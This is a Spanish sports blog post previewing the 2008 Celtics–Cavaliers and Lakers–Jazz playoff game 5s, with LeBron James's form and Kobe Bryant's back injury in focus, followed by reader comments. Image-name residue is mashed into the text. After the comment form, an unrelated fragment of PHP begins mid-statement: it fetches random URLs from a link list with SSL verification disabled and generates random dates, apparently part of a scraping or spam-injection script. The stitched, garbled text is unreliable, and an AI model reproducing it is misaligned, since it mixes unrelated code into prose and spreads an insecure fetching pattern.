Dos eliminatorias igualadas, una sencilla ecuación

14 de May de 2008 por MagicJohnson32

kobeak47utahlebjpierceTodo o nada. Ésa es la unidad de medición habitual en el deporte y, por lo general, la ecuación es sencilla: la victoria equivale al todo, y el nada es igual a derrota. Así de injusto, así de cruel y así de grande es esto. Celtics y Cavs primero (2:00 hora española), Lakers y Jazz más tarde (4:30 horas), afrontarán esta noche partidos a todo o nada. Sus respectivas eliminatorias están igualadas a dos y quienes resulten ganadores hoy tendrán todas las papeletas para llevarse la serie y el pase a las finales de Conferencia.

Ambas eliminatorias han seguido el mismo parámetro: cuatro partidos con cuatro victorias locales. Hay ciertas variables, sin embargo, que abren la posibilidad a que se produzca algún quiebro en la tendencia.

La primera variable se llama LeBron y se apellida James. El líder de los Cavs ha rendido entre lo mediocre y lo discreto, y aun así los Cavaliers siguen vivos y con todas sus opciones intactas. Si ya estuvieron a punto de robar el primer partido en Boston, pese ljmumal 2 de 18 en tiros y las 10 pérdidas de LeBron, ¿de qué serán capaces los Cavaliers si King James despega?

A los de Ohio no les queda otra que ganar este quinto partido y asegurar el sexto en su casa. Si la eliminatoria vuelve a Massachussets para el séptimo, difícilmente los Celtics dejarán escapar vivo a su rival. Así que si LeBron James tiene previsto ponerse a jugar, y ya dio algunas pistas de ello en el cuarto partido, esta noche es el momento o tendrá que ponerse a pensar en los Juegos Olímpicos.

Los Celtics deberían preocuparse, y no sólo por lo dicho. El Big Three no acaba de funcionar y siguen sin ganar un partido de Playoffs lejos de Boston, y pese a que contarán con ventaja de campo a lo largo de toda la postemporada, es muy mala señal para un equipo que aspira al Anillo. Además, Detroit ya espera tras deshacerse con facilidad de los Magic, todo un golpe de autoridad tras las dudas que dejaron ante los Sixers.

Para los Jazz, la situación es similar a la de los Cavs. Pero no es que los Lakers sean de los mejores locales de la liga. En su caso, los de Utah han de superar su propia ineptitud para rendir a buen nivel lejos del EnergySolutions, cuando el viento y los silbatos arbitrales no soplan tan a favor. Los dos primeros encuentros de la eliminatoria, disputados en el Staples, no tuvieron mucha historia y los Lakers vencieron a medio gas. Cuando la serie se desplazó a Salt Lake City, los Jazz necesitaron de un tercer partido memorable por parte de Boozer y hubieron de recurrir a una prórroga, un grandísimo Deron Williams y una lesión de espalda para llevarse el cuarto. Y aquí llega la variable que puede cambiar el destino de este enfrentamiento.

kobefloorHablábamos antes del todo o nada. Kobe Bryant anduvo realmente cerca del todo el pasado domingo. Combatió durante tres horas contra un intenso dolor de espalda que lo llevó al suelo en dos ocasiones, estuvo 47 minutos en pista, rozó el triple-doble y encontró la vía para conducir a su equipo a una remontada de 12 puntos para forzar la prórroga. Pero, entonces, ya en el tiempo extra, Bryant falló y nadie más apareció para enmendarlo. Tal vez habría bastado con asegurar el rebote ofensivo que Okur atrapó con menos de un minuto por disputarse y que acabó con una jugada de 2+1 de Kirilenko para poner a los Jazz cinco puntos arriba. Pero la derrota, como ya se ha dicho, es la nada, y hasta aquellas profundidades cayó la actuación de Bryant.

Sobre sus hombros -sobre su espalda, más bien- recae ahora el peso de la eliminatoria. Kobe aseguró tras el partido que no había ninguna posibilidad de que se perdiese el encuentro de esta noche, y sin duda no se lo perderá. Será interesante ver cómo gestionan Phil Jackson y el propio Bryant la lesión, y si Odom y Gasol son capaces de dar el paso al frente que se les requiere. Habrá que estar atentos también al rendimiento del banquillo de los Lakers y los posibles cambios que introduzca Jackson en su rotación, ya que el pésimo juego de Farmar puede relegarlo a tercer base, con Vujacic ejerciendo de primer recambio de Fisher.

Los Jazz necesitarán que Boozer no desaparezca como en sus anteriores visitas a L.A. y que Deron mantenga las riendas del partido en todo momento, como hizo en el cuarto encuentro de la serie. Kirilenko o Korver pueden desequilibrar en momentos puntuales pero ya se sabe que, llegados a este punto de la temporada, las jerarquías mandan y los partidos, las eliminatorias y los títulos, los deciden los buenos. Para ellos será el todo o la nada.

Comenta

5 comentarios a esta entrada

  1. tito dice:
    #1

    ¿Lo de la espalda de Kobe es algo así como espasmos musculares que alguien le pueda haber contagiado?

      Citar

  2. TheDeerHunter dice:
    #2

    Son situaciones similares, pero al mismo tiempo bastante diferentes por matices.

    Boston ha pasado de hacer una temporada casi perfecta a una postemporada donde le crecen hasta los enanos y para colmo la vitola de favoritos. Todo lo que no es la final es prácticamente la defenestración del proyecto.
    Lo de Hawks fue una sorpresa. Lo de Cleveland una realidad bastante fea.
    Se sienten seguros dejando a sus rivales a 75 en casa, pero ya estuvieron a punto de verle las orejas al lobo en el primero y Lebron es bicho malo para las machadas de última hora. El asunto es que están jugando a un nivel muy bajo ofensivamente y su reluciente tridente empieza a plantear muchas dudas.
    Cleveland, por contra, da la impresión de estar esperando algo y ese algo puede ser un match ball suelto por ahí.
    Lo de Lakers es distinto. Su proyecto seguirá vigente pase lo que pase y no son obligados favoritos a nada. No debería ser una decepción caer contra Spurs en una hipotética final, ni tampoco nadie podía decir a priori que era imposible que Utah los eliminara. No es una humillación, teniendo en cuenta todos los problemas físicos que arrastra el equipo.
    Además, se puede decir lo que se quiera, pero Lakers está jugando bien. Es un duelo en toda regla y punto. Se puede ganar y perder.
    No cabe duda de que sería una decepción la derrota, pero los Lakers únicamente se tienen que concentrar en tratar de hacerlo bien en la medida de lo posible. Celtics tiene una carga emocional mucho mayor y no sólo juegan contra su rival. Juegan contra sí mismos.

      Citar

  3. TheDeerHunter dice:
    #3

    Se supone que es una lumbalgia ¿no??
    lo que pasa es que aquí la peña lo traduce con el ojo (con el de atrás)

      Citar

  4. Viva_Dirk dice:
    #4

    Perder contra Utah no sería un fracaso pero si una decepción. Habrá que verlo esta noche.

      Citar

  5. Elio dice:
    #5

    Go Lakers!

    Esta noche no queda más remedio que conseguir la victoria. A ver que ocurre.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>